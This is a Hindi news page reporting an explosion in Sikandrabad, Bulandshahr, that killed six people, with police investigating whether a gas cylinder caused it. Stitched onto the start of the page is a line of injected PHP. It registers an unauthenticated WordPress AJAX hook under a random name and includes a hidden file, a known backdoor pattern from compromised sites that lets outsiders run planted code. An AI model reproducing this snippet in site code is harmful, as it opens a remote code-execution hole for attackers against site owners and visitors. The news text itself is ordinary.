if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }उ0प्र0 के जनपद बुलंदशहर में धमाके में 6 लोगों की मौत - Current Media

उ0प्र0 के जनपद बुलंदशहर में धमाके में 6 लोगों की मौत

बुलंदशहर । उत्तर प्रदेश के जनपद बुलंदशहर में सोमवार की रात तक़रीबन साढ़े आठ बजे एक विस्फोट में छह लोगों की मौत हो गई। मृतकों में एक बच्ची भी शामिल है। इस धमाके के बाद पूरे इलाके में अफरा- तफरी मच गई और पुलिस प्रशासन की टीम भी कुछ देर में बचाव के लिए घटनास्थल पर पहुंच गई।
बुलंदशहर के सिटी मजिस्ट्रेट प्रियदर्शी ने पत्रकारों से कहा, मैं यहां जिला अस्पताल पर हूं, अभी तक अस्पताल में छह शव पहुंच चुके हैं जिनमें तीन पुरुष और तीन महिलाएं शामिल हैं। मृतकों में एक बच्ची भी शामिल है। कुछ घायलों को भी यहां भर्ती कराया गया है। मौक़े पर बचाव और राहत कार्य जारी है।

उन्होंने बताया सोमवार को बुलंदशहर के सिकंदराबाद की आशापुरी कॉलोनी में रियाजुद्दीन नामक शख्स के मकान में यह हादसा हुआ है। यहां उनके परिवार के 18-19 लोग रहते हैं. रात 8 और 9 बजे के बीच सिलेंडर का ब्लास्ट हुआ है।
वहीं सिकंदराबाद की डीएसपी पूर्णिमा सिंह ने जानकारी देते हुए बताया कि विस्फोट सिलेंडर से हुआ या इसकी कोई और वजह रही, इसको लेकर जांच की जा रही है। जांच के बाद ही विस्फोट के सही कारणों का पता चल पाएगा।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

खिरिया घाट पर अवैध खनन के खिलाफ बड़ी कार्रवाई, आधा दर्जन से अधिक ट्रैक्टर-ट्रॉलियां पकड़ीं

झांसी। राशिद पठान । अवैध खनन के खिलाफ प्रशासन ने गुरुवार रात बड़ी कार्रवाई करते …